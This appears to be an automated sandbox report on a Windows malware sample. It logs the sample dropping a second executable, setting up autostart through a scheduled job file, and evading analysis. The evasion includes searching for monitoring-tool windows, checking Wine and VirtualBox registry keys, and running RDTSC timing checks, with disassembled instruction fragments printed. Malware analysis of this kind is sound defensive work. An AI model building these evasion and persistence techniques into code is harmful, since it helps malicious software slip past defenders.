Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\FRCe39S0oE.exe File created: C:\Windows\Tasks\rapes.job Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\FRCe39S0oE.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\FRCe39S0oE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1078A32 second address: 1078A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1078B59 second address: 1078B63 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F132877E3A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1078B63 second address: 1078B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1078B70 second address: 1078B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F132877E3A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1078B7A second address: 1078B82 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1078B82 second address: 1078BA7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F132877E3BBh 0x00000008 jmp 00007F132877E3B5h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F132877E3A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107BEA7 second address: F028BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1328EC0DFAh 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F1328EC0E01h 0x00000014 pop eax 0x00000015 pushad 0x00000016 clc 0x00000017 clc 0x00000018 popad 0x00000019 push dword ptr [ebp+122D11D1h] 0x0000001f mov edx, dword ptr [ebp+122D3646h] 0x00000025 call dword ptr [ebp+122D25E7h] 0x0000002b pushad 0x0000002c jmp 00007F1328EC0E02h 0x00000031 xor eax, eax 0x00000033 clc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 stc 0x00000039 mov dword ptr [ebp+122D366Eh], eax 0x0000003f jmp 00007F1328EC0E05h 0x00000044 mov esi, 0000003Ch 0x00000049 jmp 00007F1328EC0DFEh 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 sub dword ptr [ebp+122D2546h], eax 0x00000058 add dword ptr [ebp+122D2546h], edx 0x0000005e lodsw 0x00000060 jnl 00007F1328EC0DF7h 0x00000066 cmc 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b jmp 00007F1328EC0E09h 0x00000070 mov ebx, dword ptr [esp+24h] 0x00000074 jmp 00007F1328EC0DFCh 0x00000079 nop 0x0000007a pushad 0x0000007b ja 00007F1328EC0DFCh 0x00000081 push eax 0x00000082 push edx 0x00000083 jno 00007F1328EC0DF6h 0x00000089 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107BF07 second address: 107BF20 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F132877E3A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F132877E3AAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107BF20 second address: 107BF9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a call 00007F1328EC0DFAh 0x0000000f sub ch, FFFFFFA5h 0x00000012 pop edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F1328EC0DF8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f call 00007F1328EC0DF9h 0x00000034 jmp 00007F1328EC0E00h 0x00000039 push eax 0x0000003a jmp 00007F1328EC0E00h 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 pushad 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107BF9C second address: 107BFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F132877E3ACh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107BFB4 second address: 107BFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107BFB8 second address: 107C03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c ja 00007F132877E3B0h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F132877E3A8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2786h], edi 0x00000033 push 00000003h 0x00000035 movzx ecx, si 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F132877E3A8h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 00000016h 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 mov edi, ecx 0x00000056 push 00000003h 0x00000058 mov dword ptr [ebp+122D1F19h], eax 0x0000005e push 89D5E0F2h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 jne 00007F132877E3A6h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107C03E second address: 107C04C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107C1E8 second address: 107C23C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007F132877E3ADh 0x00000013 jnc 00007F132877E3BEh 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107C23C second address: 107C241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107C241 second address: 107C25B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F132877E3A6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jnc 00007F132877E3A6h 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107C25B second address: 107C29B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F1328EC0DF6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d adc edi, 3832547Fh 0x00000013 lea ebx, dword ptr [ebp+1244CD9Eh] 0x00000019 and edi, dword ptr [ebp+122D354Ah] 0x0000001f mov dword ptr [ebp+122D33FDh], edx 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F1328EC0E08h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 107C29B second address: 107C2A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109A30C second address: 109A32D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109A32D second address: 109A331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109A586 second address: 109A5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1328EC0DFDh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109A5A0 second address: 109A5C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109A5C0 second address: 109A5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109A5C8 second address: 109A5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109ABD7 second address: 109ABDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109ABDD second address: 109ABE8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F132877E3A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109AD18 second address: 109AD22 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1328EC0DF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109AD22 second address: 109AD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109AD28 second address: 109AD6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1328EC0E07h 0x00000008 jno 00007F1328EC0DF6h 0x0000000e jmp 00007F1328EC0DFEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F1328EC0E04h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109AD6F second address: 109AD8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jg 00007F132877E3A6h 0x00000012 jne 00007F132877E3A6h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109AEFD second address: 109AF18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1328EC0DFAh 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jng 00007F1328EC0DF6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1092E8A second address: 1092E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109BE75 second address: 109BE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F1328EC0E07h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 109FD4A second address: 109FD66 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F132877E3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F132877E3B6h 0x00000010 jmp 00007F132877E3AAh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A62F6 second address: 10A62FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 106876A second address: 1068773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1068773 second address: 106877D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1328EC0DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A566B second address: 10A5685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A5685 second address: 10A5693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F1328EC0DF8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A57EB second address: 10A581B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 ja 00007F132877E3A6h 0x0000000e jp 00007F132877E3A6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 jmp 00007F132877E3B7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A581B second address: 10A582E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1328EC0DF6h 0x00000008 jne 00007F1328EC0DF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A582E second address: 10A584F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F132877E3B8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A59E6 second address: 10A59EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A6190 second address: 10A619C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A619C second address: 10A61A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A8721 second address: 10A8735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jng 00007F132877E3A6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A9127 second address: 10A912B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A912B second address: 10A9131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A9131 second address: 10A917B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1328EC0E02h 0x0000000e nop 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F1328EC0E06h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F1328EC0E04h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A9CF3 second address: 10A9CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A9CF7 second address: 10A9D01 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1328EC0DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AA653 second address: 10AA658 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10A9D01 second address: 10A9D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F1328EC0DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AA658 second address: 10AA665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AB699 second address: 10AB69D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AA665 second address: 10AA669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AB69D second address: 10AB6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F1328EC0DF6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AD973 second address: 10AD977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10ACBFD second address: 10ACC03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AD977 second address: 10AD9B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F132877E3BFh 0x0000000f jmp 00007F132877E3B9h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F132877E3ABh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10ACC03 second address: 10ACC2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F1328EC0DF6h 0x00000009 jmp 00007F1328EC0E02h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F1328EC0DF8h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10AD9B6 second address: 10ADA1F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F132877E3ACh 0x00000008 jo 00007F132877E3A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 clc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F132877E3A8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1F0Fh], ecx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F132877E3A8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 stc 0x00000051 push eax 0x00000052 ja 00007F132877E3B4h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10ACC2C second address: 10ACC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B2911 second address: 10B2916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B2916 second address: 10B291B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B4DCE second address: 10B4DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B3070 second address: 10B3074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
